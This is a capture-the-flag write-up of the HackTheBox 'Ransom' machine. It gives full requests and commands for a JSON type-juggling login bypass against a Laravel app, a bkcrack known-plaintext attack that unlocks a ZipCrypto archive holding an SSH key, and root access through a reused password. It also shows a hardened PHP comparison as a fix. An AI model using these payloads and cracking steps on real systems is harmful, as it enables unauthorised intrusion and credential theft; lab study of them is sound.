HackTheBox Ransom
Ransom
Intrusion
nmap
┌──(kali㉿kali)-[~/Desktop/Ransom]
└─$ sudo nmap -Pn -n -v --reason -sS -p- --min-rate=1000 -A 10.10.11.153 -oN nmap.log
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ea:84:21:a3:22:4a:7d:f9:b5:25:51:79:83:a4:f5:f2 (RSA)
| 256 b8:39:9e:f4:88:be:aa:01:73:2d:10:fb:44:7f:84:61 (ECDSA)
|_ 256 22:21:e9:f4:85:90:87:45:16:1f:73:36:41:ee:3b:32 (ED25519)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-title: Admin - HTML5 Admin Template
|_Requested resource was http://10.10.11.153/login
Ports 22 and 80 are open.
web
A login screen is displayed.
Login Bypass
As a test, enter "password" and try to log in.
GET /api/login?password=password HTTP/1.1
Host: 10.10.11.153
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://10.10.11.153/login
The login fails, but checking Burp Suite shows that the entered password is sent as a GET parameter.
POST /api/login HTTP/1.1
Host: 10.10.11.153
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://10.10.11.153/login
password=password
As a test, change the method to POST and resend the request.
HTTP/1.0 405 Method Not Allowed
Date: Sun, 09 Oct 2022 07:07:51 GMT
Server: Apache/2.4.41 (Ubuntu)
Allow: GET, HEAD
Cache-Control: no-cache, private
Access-Control-Allow-Origin: *
Content-Length: 7665
Connection: close
Content-Type: application/json
{
"message": "The POST method is not supported for this route. Supported methods: GET, HEAD.",
"exception": "Symfony\\Component\\HttpKernel\\Exception\\MethodNotAllowedHttpException",
"file": "/srv/prod/vendor/laravel/framework/src/Illuminate/Routing/AbstractRouteCollection.php",
"line": 117,
"trace": [
A JSON response came back along with the 405.
A JSON-based bypass might be possible, but searching online turned up no way to do it with GET.
GET /api/login HTTP/1.1
Host: 10.10.11.153
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://10.10.11.153/login
Content-Type: application/json
Content-Length: 28
{
"password":"password"
}
As a long shot, write the same JSON body as for POST directly into the GET request.
HTTP/1.1 200 OK
Date: Sun, 09 Oct 2022 07:42:21 GMT
Server: Apache/2.4.41 (Ubuntu)
Cache-Control: no-cache, private
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 59
Access-Control-Allow-Origin: *
Set-Cookie: laravel_session=eyJpdiI6Img0ZGQ4dlhXSUMvV093NytldzBIN1E9PSIsInZhbHVlIjoiaktES3FkVTIyY0dwbFlZN1FwRlNSVWVUUEp0Ylh6cWN1WW1EY01kU3B0YmRPeENsSm1QbnJ6ckp6L0pGTHluU1pjRkVxTG5CTWh1eTk0bjVYUlBFQ3k2bzBXZzlwald5TXJ5c0I4Y0tlQXlFVG5JNzdCZzVKb2R2S0grR2xLZWMiLCJtYWMiOiI2ZGVmNDk4ZTkyYjg3YzkzMGVlZmZiYTNjODJmYTQzNWE2YzAzYTEzZDdmOTJiNzI3MTZiZDRjZWZkZDU2YmI2IiwidGFnIjoiIn0%3D; expires=Sun, 09-Oct-2022 09:42:21 GMT; Max-Age=7200; path=/; samesite=lax
Content-Length: 16
Connection: close
Content-Type: text/html; charset=UTF-8
Invalid Password
The response is "Invalid Password", so passing the parameter as JSON somehow worked.
GET /api/login HTTP/1.1
Host: 10.10.11.153
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://10.10.11.153/login
Cookie: XSRF-TOKEN=eyJpdiI6Ikk5TUs2dWIxNFFXVU5CQXVneDhNemc9PSIsInZhbHVlIjoiNnV4aWJtN0w4bVY3RENaczRwRXl0T2dQZFZCU2tZYi9qS0ZML0MraWd2Wit4cUxFVVV2TnRyZ2ZPQlY3Z0lSTmUvczl5N3pvcnZYZG1BNEdpWjRIV2hJUnc4SDl5dThQdDQxNU5ZRHYyNmVHeW9TM0tiZzI0aU8vUWhKNUliMnYiLCJtYWMiOiJhNDA4YzlkN2U4ZjMyZjIyYzc1YThjODI5OGJlYmE5YWJkYzAwNTdhOWE4ZjNmN2NlNzM4NmIyNWIwYjEwZjllIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlkxVWZSQnVoMUpmOHJEaFJYWTRQaFE9PSIsInZhbHVlIjoiejY4cTdINEFlbFFBMjJyUnJZbG5XRUM5dmpQRVhpaXoySGZweXo0NElhRTNhL05UazEvK3BmeVRUMGpsSEJYbTdXU05EWjUrbjJMRHFLZnlkNHV5VGkrdG55NjhrbE83QnRna2o0UEFnQVNodkVMWXNnYW5oRWxDUmRmMGVpOEkiLCJtYWMiOiJmYWY5M2RmYTdkZjYxOWIyYWYxNGI2ZDE4NzIwYWFlYjNjOGM5NmUxNDM3MzczZTE3Y2UxZDM3YjAwZWM0Y2QwIiwidGFnIjoiIn0%3D
Content-Type: application/json
Content-Length: 22
{
"password":true
}
To bypass the check, change password to true.
HTTP/1.1 200 OK
Date: Sun, 09 Oct 2022 07:44:25 GMT
Server: Apache/2.4.41 (Ubuntu)
Cache-Control: no-cache, private
X-RateLimit-Limit: 60
X-RateLimit-Remaining: 59
Access-Control-Allow-Origin: *
Set-Cookie: laravel_session=eyJpdiI6IjdXaWFGRXpybm9qcFhvaHZEZXJyUXc9PSIsInZhbHVlIjoiVDFOeEpmSkdCQUlzVEZFRklpQkZUTTh1aDhwejlFYlpERmRGNlpzYnpwVU1NdlJOanRWZUFaSlArckx3TVJpQmg5N29mTlVWMiswbmpSK2preFl5ZlZUcTFpS0pGZGI4Zm90aXhFR1NMRUFyZGRzcHpLUzVISERORXlGMDdyNHMiLCJtYWMiOiIxYjMxNGIyNWFjNzVjZTEzMjNjMzJmMzY2MjU5ZmZmYjU5M2MxMTEwYmExZGMwZjFhZTZhNmY2Y2U1YWZlMDExIiwidGFnIjoiIn0%3D; expires=Sun, 09-Oct-2022 09:44:25 GMT; Max-Age=7200; path=/; samesite=lax
Content-Length: 16
Connection: close
Content-Type: text/html; charset=UTF-8
Login Successful
"Login Successful" is displayed, confirming the bypass worked.
homedirectory.zip
Now that login works, look around the site.
A zip file and a user.txt file can be downloaded.
┌──(kali㉿kali)-[~/Desktop/Ransom]
└─$ unzip uploaded-file-3422.zip
Archive: uploaded-file-3422.zip
[uploaded-file-3422.zip] .bash_logout password:
Downloaded the zip file and tried to extract it, but it asks for a password and cannot be extracted.
┌──(kali㉿kali)-[~/Desktop/Ransom]
└─$ unzip -l uploaded-file-3422.zip
Archive: uploaded-file-3422.zip
Length Date Time Name
--------- ---------- ----- ----
220 2020-02-25 21:03 .bash_logout
3771 2020-02-25 21:03 .bashrc
807 2020-02-25 21:03 .profile
0 2021-07-03 03:58 .cache/
0 2021-07-03 03:58 .cache/motd.legal-displayed
0 2021-07-03 03:58 .sudo_as_admin_successful
0 2022-03-07 21:32 .ssh/
2610 2022-03-07 21:32 .ssh/id_rsa
564 2022-03-07 21:32 .ssh/authorized_keys
564 2022-03-07 21:32 .ssh/id_rsa.pub
2009 2022-03-07 21:32 .viminfo
--------- -------
10545 11 files
Listing the contents with the -l option reveals an SSH private key.
┌──(kali㉿kali)-[~/Desktop/Ransom]
└─$ zip2john uploaded-file-3422.zip > uploaded-file-3422-hash.zip
ver 2.0 efh 5455 efh 7875 uploaded-file-3422.zip/.bash_logout PKZIP Encr: 2b chk, TS_chk, cmplen=170, decmplen=220, crc=6CE3189B
ver 2.0 efh 5455 efh 7875 uploaded-file-3422.zip/.bashrc PKZIP Encr: 2b chk, TS_chk, cmplen=1752, decmplen=3771, crc=AB254644
ver 2.0 efh 5455 efh 7875 uploaded-file-3422.zip/.profile PKZIP Encr: 2b chk, TS_chk, cmplen=404, decmplen=807, crc=D1B22A87
ver 1.0 uploaded-file-3422.zip/.cache/ is not encrypted, or stored with non-handled compression type
ver 1.0 efh 5455 efh 7875 uploaded-file-3422.zip/.cache/motd.legal-displayed PKZIP Encr: 2b chk, TS_chk, cmplen=12, decmplen=0, crc=0
ver 1.0 efh 5455 efh 7875 uploaded-file-3422.zip/.sudo_as_admin_successful PKZIP Encr: 2b chk, TS_chk, cmplen=12, decmplen=0, crc=0
ver 1.0 uploaded-file-3422.zip/.ssh/ is not encrypted, or stored with non-handled compression type
ver 2.0 efh 5455 efh 7875 uploaded-file-3422.zip/.ssh/id_rsa PKZIP Encr: 2b chk, TS_chk, cmplen=1990, decmplen=2610, crc=38804579
ver 2.0 efh 5455 efh 7875 uploaded-file-3422.zip/.ssh/authorized_keys PKZIP Encr: 2b chk, TS_chk, cmplen=475, decmplen=564, crc=CB143C32
ver 2.0 efh 5455 efh 7875 uploaded-file-3422.zip/.ssh/id_rsa.pub PKZIP Encr: 2b chk, TS_chk, cmplen=475, decmplen=564, crc=CB143C32
ver 2.0 efh 5455 efh 7875 uploaded-file-3422.zip/.viminfo PKZIP Encr: 2b chk, TS_chk, cmplen=581, decmplen=2009, crc=396B04B4
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
Tried zip2john to crack it, but it did not work.
┌──(kali㉿kali)-[~/Desktop/Ransom]
└─$ 7z l -slt uploaded-file-3422.zip
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Core(TM) i5-8259U CPU @ 2.30GHz (806EA),ASM,AES-NI)
Scanning the drive for archives:
1 file, 7735 bytes (8 KiB)
Listing archive: uploaded-file-3422.zip
--
Path = uploaded-file-3422.zip
Type = zip
Physical Size = 7735
----------
Path = .bash_logout
Folder = -
Size = 220
Packed Size = 170
Modified = 2020-02-25 21:03:22
Created =
Accessed =
Attributes = _ -rw-r--r--
Encrypted = +
Comment =
CRC = 6CE3189B
Method = ZipCrypto Deflate
Host OS = Unix
Version = 20
Volume Index = 0
Inspect the zip file with 7z.
This time the ZipCrypto algorithm appears to be in use.
Another note about zip cracking is that if you have an unencrypted/uncompressed copy of any one of the files that are compressed in the encrypted zip, you can perform a "plaintext attack" and crack the zip, as detailed here, and explained in this paper. The newer scheme for password-protecting zip files (with AES-256, rather than "ZipCrypto") does not have this weakness.
Looking up the algorithm on HackTricks: ZipCrypto is vulnerable to a known-plaintext attack, so with an unencrypted copy of one of the files inside the encrypted archive, the archive can apparently be decrypted.
┌──(kali㉿kali)-[~]
└─$ ls -la
total 169732
drwxr-xr-x 26 kali kali 4096 Oct 9 15:15 .
drwxr-xr-x 3 root root 4096 May 31 2021 ..
drwxr-x--- 2 kali kali 4096 Jun 5 11:13 .android
-rw-r--r-- 1 kali kali 32 Aug 20 18:12 .bash_history
-rw-r--r-- 1 kali kali 220 May 31 2021 .bash_logout
-rw-r--r-- 1 kali kali 5349 May 31 2021 .bashrc
-rw-r--r-- 1 kali kali 3526 May 31 2021 .bashrc.original
Searched for a matching file and found .bash_logout. Its size is also 220, the same, so it looks usable.
bkcrack
This time, use a tool called bkcrack.
GitHub -> https://github.com/kimci86/bkcrack
┌──(kali㉿kali)-[~/Desktop/HackTheBox/tool/bkcrack-1.5.0-Linux]
└─$ ./bkcrack -h
bkcrack 1.5.0 - 2022-07-07
usage: bkcrack [options]
Crack legacy zip encryption with Biham and Kocher's known plaintext attack.
Options to get the internal password representation:
-c, --cipher-file <file> Zip entry or file on disk containing ciphertext
--cipher-index <index> Index of the zip entry containing ciphertext
-C, --cipher-zip <archive> Zip archive containing the ciphertext entry
-p, --plain-file <file> Zip entry or file on disk containing plaintext
--plain-index <index> Index of the zip entry containing plaintext
-P, --plain-zip <archive> Zip archive containing the plaintext entry
The encrypted file is specified with -c and -C, and the plaintext file with -p and -P.
┌──(kali㉿kali)-[~]
└─$ zip plain.zip .bash_logout
adding: .bash_logout (deflated 28%)
Create a plaintext zip file to pass with -P.
┌──(kali㉿kali)-[~/Desktop/Ransom]
└─$ ./bkcrack -C uploaded-file-3422.zip -c .bash_logout -P plain.zip -p .bash_logout
bkcrack 1.5.0 - 2022-07-07
[17:47:52] Z reduction using 151 bytes of known plaintext
100.0 % (151 / 151)
[17:47:52] Attack on 56903 Z values at index 6
Keys: 7b549874 ebc25ec5 7e465e18
75.5 % (42939 / 56903)
[17:50:14] Keys
7b549874 ebc25ec5 7e465e18
Running bkcrack recovered the internal keys.
┌──(kali㉿kali)-[~/Desktop/Ransom]
└─$ ./bkcrack -C uploaded-file-3422.zip -k 7b549874 ebc25ec5 7e465e18 -U pass.zip pass
bkcrack 1.5.0 - 2022-07-07
[17:53:10] Writing unlocked archive pass.zip with password "pass"
100.0 % (9 / 9)
Wrote unlocked archive.
Using the keys, create a zip file that can be extracted with the password "pass".
┌──(kali㉿kali)-[~/Desktop/Ransom]
└─$ unzip pass.zip
Archive: pass.zip
[pass.zip] .bash_logout password:
inflating: .bash_logout
inflating: .bashrc
inflating: .profile
creating: .cache/
extracting: .cache/motd.legal-displayed
extracting: .sudo_as_admin_successful
creating: .ssh/
inflating: .ssh/id_rsa
inflating: .ssh/authorized_keys
inflating: .ssh/id_rsa.pub
inflating: .viminfo
Extraction succeeded.
Shell as htb
SSH
Check the extracted authorized_keys file.
┌──(kali㉿kali)-[~/Desktop/Ransom/.ssh]
└─$ cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDrDTHWkTw0RUfAyzj9U3Dh+ZwhOUvB4EewA+z6uSunsTo3YA0GV/j6EaOwNq6jdpNrb9T6tI+RpcNfA+icFj+6oRj8hOa2q1QPfbaej2uY4MvkVC+vGac1BQFs6gt0BkWM9JY7nYJ2y0SIibiLDDB7TwOx6gem4Br/35PW2sel8cESyR7JfGjuauZM/DehjJJGfqmeuZ2Yd2Umr4rAt0R4OEAcWpOX94Tp+JByPAT5m0CU557KyarNlW60vy79njr8DR8BljDtJ4n9BcOPtEn+7oYvcLVksgM4LB9XzdDiXzdpBcyi3+xhFznFKDYUf6NfAud2sEWae7iIsCYtmjx6Jr9Zi2MoUYqWXSal8o6bQDIDbyD8hApY5apdqLtaYMXpv+rMGQP5ZqoGd3izBM9yZEH8d9UQSSyym/te07GrCax63tb6lYgUoUPxVFCEN4RmzW1VuQGvxtfhu/rK5ofQPac8uaZskY3NWLoSF56BQqEG9waI4pCF5/Cq413N6/M= htb@ransom
The key's trailing comment is htb@ransom, suggesting an htb user exists.
┌──(kali㉿kali)-[~/Desktop/Ransom/.ssh]
└─$ ssh -i id_rsa htb@10.10.11.153
The authenticity of host '10.10.11.153 (10.10.11.153)' can't be established.
ECDSA key fingerprint is SHA256:tT45oQAnI0hnOIQg3ZvtoS4RG00xhxxBJua12YRVv2g.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.153' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-77-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Mon Jul 5 11:34:49 2021
htb@ransom:~$ whoami
htb
Intrusion successful.
user flag
htb@ransom:~$ cat user.txt
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Flag obtained.
Privilege escalation
sudo
htb@ransom:~$ sudo -l
[sudo] password for htb:
A password is required, so sudo cannot be used.
apache2
First, look at the file implementing the bypassed password check and search for the configured password.
htb@ransom:/etc/apache2/sites-enabled$ cat 000-default.conf
<VirtualHost *:80>
    ServerAdmin webmaster@localhost
    DocumentRoot /srv/prod/public
    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined
    <Directory /srv/prod/public>
        Options +FollowSymlinks
        AllowOverride All
        Require all granted
    </Directory>
</VirtualHost>
From 000-default.conf, the document root is under /srv/.
htb@ransom:/srv/prod$ cat server.php
<?php
/**
 * Laravel - A PHP Framework For Web Artisans
 *
 * @package Laravel
 * @author Taylor Otwell <taylor@laravel.com>
 */
$uri = urldecode(
    parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH)
);
// This file allows us to emulate Apache's "mod_rewrite" functionality from the
// built-in PHP web server. This provides a convenient way to test a Laravel
// application without having installed a "real" web server software here.
if ($uri !== '/' && file_exists(__DIR__.'/public'.$uri)) {
    return false;
}
require_once __DIR__.'/public/index.php';
Found the Laravel-specific server.php file.
grep
Since a successful login displays "Login Successful", search for that string.
htb@ransom:/srv/prod$ grep -r "Login Successful"
resources/views/auth/login.blade.php: if (data === 'Login Successful') {
storage/framework/views/716af88e12f9db05fa041bff2e06875d7f0b09db.php: if (data === 'Login Successful') {
app/Http/Controllers/AuthController.php: return "Login Successful";
Three files match, but two only use the string in an if statement, so focus on AuthController.php.
htb@ransom:/srv/prod$ cat app/Http/Controllers/AuthController.php
public function customLogin(Request $request)
{
    $request->validate([
        'password' => 'required',
    ]);
    if ($request->get('password') == "UHC-March-Global-PW!") {
        session(['loggedin' => True]);
        return "Login Successful";
    }
    return "Invalid Password";
}
Found the password UHC-March-Global-PW!
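The loose `==` in the controller is what the JSON body exploits: Laravel decodes a JSON request body, so `password` reaches the comparison as the PHP boolean `true`, and `true == "any non-empty string"` is true. The following is an added example, not code from the box or the writeup (the secret is a constructed placeholder), showing the loose check beside a hardened one that requires a string and compares with `hash_equals`.

```php
<?php
// Added example, not the box's code. EXPECTED is a constructed placeholder secret.
const EXPECTED = 'constructed-placeholder-secret';

// Vulnerable check: same shape as the controller's comparison.
// With a JSON body of {"password":true}, bool(true) == 'non-empty string'
// evaluates to true in PHP, so the check passes without the secret.
function loginLoose($password): bool
{
    return $password == EXPECTED;
}

// Hardened check: reject anything that is not a string, then compare with
// hash_equals(), which is strict about type and runs in constant time.
function loginStrict($password): bool
{
    if (!is_string($password)) {
        return false;
    }
    return hash_equals(EXPECTED, $password);
}

// Constructed request bodies: the correct secret, a wrong one, and the
// type-juggling bypass seen on the box.
$bodies = [
    '{"password":"constructed-placeholder-secret"}',
    '{"password":"wrong"}',
    '{"password":true}',
];

foreach ($bodies as $body) {
    $password = json_decode($body, true)['password'];
    printf(
        "%-46s loose=%-5s strict=%s\n",
        $body,
        var_export(loginLoose($password), true),
        var_export(loginStrict($password), true)
    );
}
```

In the Laravel controller itself the equivalent fix is to validate with `'password' => 'required|string'`, so non-string JSON values are rejected before the comparison runs.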
Shell as root
su
Try the password obtained earlier.
htb@ransom:~$ sudo -l
[sudo] password for htb:
Sorry, try again.
It does not work.
As a long shot, try su.
htb@ransom:~$ su -
Password:
root@ransom:~# whoami
root
Privilege escalation succeeded.
root flag
root@ransom:~# cat root.txt
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Thoughts
The JSON-format login bypass on this box was very interesting. The problem was that the password comparison used "==" instead of "===" (which also compares types). Reusing the web login password for root as well felt quite scary.